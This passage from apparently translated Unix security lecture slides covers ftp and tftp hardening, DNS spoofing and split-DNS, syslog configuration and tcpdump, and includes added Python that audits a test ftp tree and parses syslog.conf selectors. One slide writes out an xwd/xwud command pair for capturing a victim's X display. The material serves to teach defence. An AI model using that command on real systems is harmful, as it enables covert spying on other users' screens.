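        with open(os.path.join(tmp, "etc", "group"), "w") as f:
            f.write("ftp::50:\n")
        os.chmod(os.path.join(tmp, "etc", "passwd"), 0o444)
        os.chmod(os.path.join(tmp, "etc", "group"), 0o644)    # mistake: should be 0444
        for d, mode in (("bin", 0o555), ("etc", 0o555), ("lib", 0o555),
                        ("pub", 0o577), ("incoming", 0o777)):   # incoming: mistake
            os.chmod(os.path.join(tmp, d), mode)
        os.chmod(tmp, 0o555)
        return audit_ftp_home(tmp)
    finally:
        for dirpath, _, _ in os.walk(tmp):
            os.chmod(dirpath, 0o700)     # restore so the tree can be removed
        shutil.rmtree(tmp)
```

The directories bin and etc are created with mode 555 here, as in the step list, rather than the 111 of the RedHat listing, because a directory without read permission cannot be listed by the auditing user.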
ftp (4): /etc/ftpusers
• /etc/ftpusers holds the accounts that are not allowed to connect
via ftp, for example root, bin ...
• Example /etc/ftpusers of Linux Redhat 6.0
[root@pateur /tmp]# more /etc/ftpusers
root
bin
daemon
adm
lp
sync
shutdown
halt
mail
news
uucp
operator
games
nobody
[root@pateur /tmp]#
• The file /etc/shells holds the shells
that users are allowed to use, such as
bash, sh, ash, bsh ...
tftp
• Because tftp requires no password, pay attention to security
when using tftp.
• The tftp of SUNOS before 4.0 has a bug that allows files to be fetched (get),
even those in /etc. This version must be replaced.
Domain Name System (DNS)

• The first DNS flaw is that DNS servers and clients do not
check whether the answer they receive comes from the server they
asked or from some other source. A server may cache
this bogus information and use it to answer later queries.
• For example, an intruder can tell the server that the IP of their
machine is that of a machine you trust, and their
machine can then rlogin without a password.
• BIND version 4.9 fixes the flaw described above.
• On some OSes (for example SUNOS 4.x) a lookup/double
reverse lookup is performed automatically. That is, DNS resolves
IP -> Name, then Name -> IP, and checks whether the two IPs match.
However, this method does not completely eliminate the
DNS flaw.
Social Engineering attack
• DNS often gives away a lot of information about the internal network,
such as host names and machine types ... With this information an intruder
can pose as a maintenance technician, ask to look at a machine, and may
ask for a password.
• How do we avoid giving the intruder too much information?
One option is to run 2 DNS servers: one placed inside the
firewall, holding the full information, and a second DNS server outside,
holding only the bare minimum of information needed for the network's
connectivity. The two fields HINFO and TXT usually contain a lot of
information that is purely for internal use.

[Figure: the Internet on one side of a packet filter and the internal network on the other; the fake DNS server sits outside the packet filter, the real DNS server and the DNS clients sit inside]
Setup fake and real servers
• The fake server is the primary server for your domain.
The primary server must hold enough information about the machines
that need to connect directly to the Internet, such as the www, ftp, news ...
servers. This information must allow a double reverse lookup to succeed,
because nowadays many ftp and mail servers only serve a client after the
double reverse lookup has succeeded.
• The real DNS server carries a forwarders directive pointing to the fake
server, and the real server is a slave server. Thus the real server asks
the fake server about the addresses it does not know.
• The real server can hold all the details of the internal network,
to answer the DNS clients on the internal network, while no outsider
can find this information. Even the DNS client on the outside machine that
hosts the fake DNS server queries the real server, through resolv.conf.
SYSLOG
/etc/syslog.conf

The facility is one of the following keywords: auth, auth-priv, cron, daemon, kern, lpr,
mail, mark, news, security (same as auth), syslog, user, uucp and local0 through
local7. The keyword security should not be used anymore and mark is only for internal
use and therefore should not be used in applications. Anyway, you may want to specify
and redirect these messages here. The facility specifies the subsystem that produced the
message, i.e. all mail programs log with the mail facility (LOG_MAIL) if they log
using syslog.
The priority is one of the following keywords, in ascending order: debug, info, notice,
warning, warn (same as warning), err, error (same as err), crit, alert, emerg, panic (same
as emerg). The keywords error, warn and panic are deprecated and should not be used
anymore. The priority defines the severity of the message.
In general, /var/adm/messages holds the information about logon events.
Pay particular attention to logins by root. A good general rule is to
log in with an ordinary account and then su when necessary, so that it is known
who used root privileges.
/etc/syslog.conf can be configured to send the log information to another machine.
SYSLOG (2)
/etc/syslog.conf
# Log all kernel messages to the console.
# Logging much else clutters up the screen.
#kern.* /dev/console
# Log anything (except mail) of level info or higher.
# Don't log private authentication messages!
*.info;mail.none;news.none;authpriv.none /var/log/messages
# The authpriv file has restricted access.
authpriv.* /var/log/secure
# Log all the mail messages in one place.
mail.* /var/log/maillog
# Everybody gets emergency messages, plus log them on another
# machine.
*.emerg *
/etc/syslog.conf
# Save mail and news errors of level err and higher in a
# special file.
uucp,news.crit /var/log/spooler
# Save boot messages also to boot.log
local7.* /var/log/boot.log
#
# INN
#
news.=crit /var/log/news/news.crit
news.=err /var/log/news/news.err
news.notice /var/log/news/news.notice
[root@pateur /tmp]#
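To see where a given message actually lands under the configuration above, here is an added Python example (my own code, not from the slides or from syslogd) that interprets the selector syntax of /etc/syslog.conf: `*`, `none`, `=prio`, a bare priority meaning that priority and higher, comma-separated facility lists, and the rule that within one selector the last sub-selector naming a facility wins, which is how `mail.none` carves mail out of `*.info`. The `!` negations of some syslogd versions are not implemented. The configuration is a constructed copy of the one shown above.

```python
# Added example (not from the original slides): a small interpreter for the
# selector syntax of /etc/syslog.conf.
PRIORITIES = ["debug", "info", "notice", "warning", "err", "crit", "alert", "emerg"]
ALIASES = {"warn": "warning", "error": "err", "panic": "emerg", "security": "auth"}


def parse_syslog_conf(text):
    """Return [(selector, action)] for every non-comment line."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        selector, action = line.split(None, 1)
        rules.append((selector, action.strip()))
    return rules


def priority_matches(spec, priority):
    """spec is the text after the dot in one sub-selector."""
    if spec == "*":
        return True
    if spec == "none":
        return False
    exact = spec.startswith("=")
    name = ALIASES.get(spec.lstrip("="), spec.lstrip("="))
    level = PRIORITIES.index(name)
    msg = PRIORITIES.index(ALIASES.get(priority, priority))
    return msg == level if exact else msg >= level


def selector_matches(selector, facility, priority):
    """'*.info;mail.none;authpriv.none': the last sub-selector naming the
    facility decides."""
    result = False
    for part in selector.split(";"):
        facilities, _, spec = part.rpartition(".")
        facilities = [ALIASES.get(f, f) for f in facilities.split(",")]
        if "*" in facilities or ALIASES.get(facility, facility) in facilities:
            result = priority_matches(spec, priority)
    return result


def route(conf_text, facility, priority):
    """Actions (files, '*', '@host') that receive a message of facility.priority."""
    return [action for selector, action in parse_syslog_conf(conf_text)
            if selector_matches(selector, facility, priority)]


# Constructed copy of the RedHat-style configuration shown above.
SAMPLE_SYSLOG_CONF = """\
#kern.*                                  /dev/console
*.info;mail.none;news.none;authpriv.none /var/log/messages
authpriv.*                               /var/log/secure
mail.*                                   /var/log/maillog
*.emerg                                  *
uucp,news.crit                           /var/log/spooler
local7.*                                 /var/log/boot.log
news.=crit                               /var/log/news/news.crit
news.=err                                /var/log/news/news.err
news.notice                              /var/log/news/news.notice
"""
```

Running `route(SAMPLE_SYSLOG_CONF, "authpriv", "notice")` shows why the comment "Don't log private authentication messages!" matters: the su and login records go only to /var/log/secure, which has restricted access, and never to the world-readable messages file.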
TCPDUMP
• tcpdump is a utility that lets us monitor connections.
It is a very powerful tool for maintaining the network, and at the
same time for watching for intrusion attempts.
• Some commonly used options:
Capturing the screen
• With a few commands, an intruder can copy
the contents of someone else's screen:

• xwd -display victim:0 -root >screen.out

• xwud -in screen.out
Summary
• Review /etc/inetd.conf and remove the unnecessary services,
especially on bastion hosts. Change the user of the services
to "weaker" users, for example run finger as nobody.
• Check the ftp installation carefully; test the write (upload) capability
of anonymous ftp.
• Check the versions of sendmail, /bin/mail, named,
finger and tftp.
• Configure the syslog system.
• Monitor connections with tcpdump or an equivalent program.
